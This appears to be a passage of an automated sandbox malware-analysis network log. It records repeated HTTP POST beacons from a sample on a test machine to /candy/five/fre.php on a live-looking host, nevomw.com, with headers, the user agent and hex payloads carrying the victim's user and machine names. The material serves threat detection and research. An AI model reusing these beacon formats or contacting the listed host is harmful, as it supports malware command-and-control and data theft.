                                            153 | 192.168.2.6 | 49900 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:53.899708033 CET | 1529 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:53.952516079 CET | 1529 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:54.026077032 CET | 1530 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            154 | 192.168.2.6 | 49902 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:54.292505026 CET | 1539 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:54.353563070 CET | 1540 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:54.429546118 CET | 1540 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            155 | 192.168.2.6 | 49903 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:54.722059965 CET | 1541 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:54.774919033 CET | 1541 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:54.853921890 CET | 1542 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            156 | 192.168.2.6 | 49904 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:55.140343904 CET | 1542 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:55.192606926 CET | 1543 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:55.270211935 CET | 1543 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            157 | 192.168.2.6 | 49905 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:55.522610903 CET | 1544 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:55.577641964 CET | 1544 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:55.652744055 CET | 1545 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            158 | 192.168.2.6 | 49906 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:55.936892986 CET | 1545 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:55.989226103 CET | 1546 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:56.061289072 CET | 1546 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            159 | 192.168.2.6 | 49907 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:56.339313030 CET | 1547 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:56.391856909 CET | 1547 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:56.464035988 CET | 1547 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            16 | 192.168.2.6 | 49729 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:49.753380060 CET | 93 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:49.806524038 CET | 94 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:49.881766081 CET | 94 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            160 | 192.168.2.6 | 49908 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:56.737421036 CET | 1548 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:56.790050983 CET | 1549 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:56.865797043 CET | 1549 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            161 | 192.168.2.6 | 49909 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:57.123188019 CET | 1550 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:57.175045967 CET | 1550 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:57.270092964 CET | 1550 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            162 | 192.168.2.6 | 49910 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:57.538551092 CET | 1551 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:57.592422962 CET | 1552 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:57.668447018 CET | 1552 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            163 | 192.168.2.6 | 49911 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:57.975991011 CET | 1553 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:58.028104067 CET | 1553 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:58.112591982 CET | 1553 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            164 | 192.168.2.6 | 49912 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:58.357650042 CET | 1554 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:58.410573959 CET | 1554 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:58.484031916 CET | 1555 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            165 | 192.168.2.6 | 49913 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:58.743469954 CET | 1556 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:58.796829939 CET | 1556 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:58.873219013 CET | 1556 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            166 | 192.168.2.6 | 49914 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:59.169840097 CET | 1557 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:59.226135969 CET | 1557 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:59.308444023 CET | 1558 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            167 | 192.168.2.6 | 49915 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:59.598388910 CET | 1559 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:59.652334929 CET | 1559 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:59.725656033 CET | 1559 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            168 | 192.168.2.6 | 49916 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:00.003773928 CET | 1560 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:00.057231903 CET | 1560 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:00.132744074 CET | 1561 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            169 | 192.168.2.6 | 49917 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:00.415813923 CET | 1562 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:00.471972942 CET | 1562 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:00.545377016 CET | 1562 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
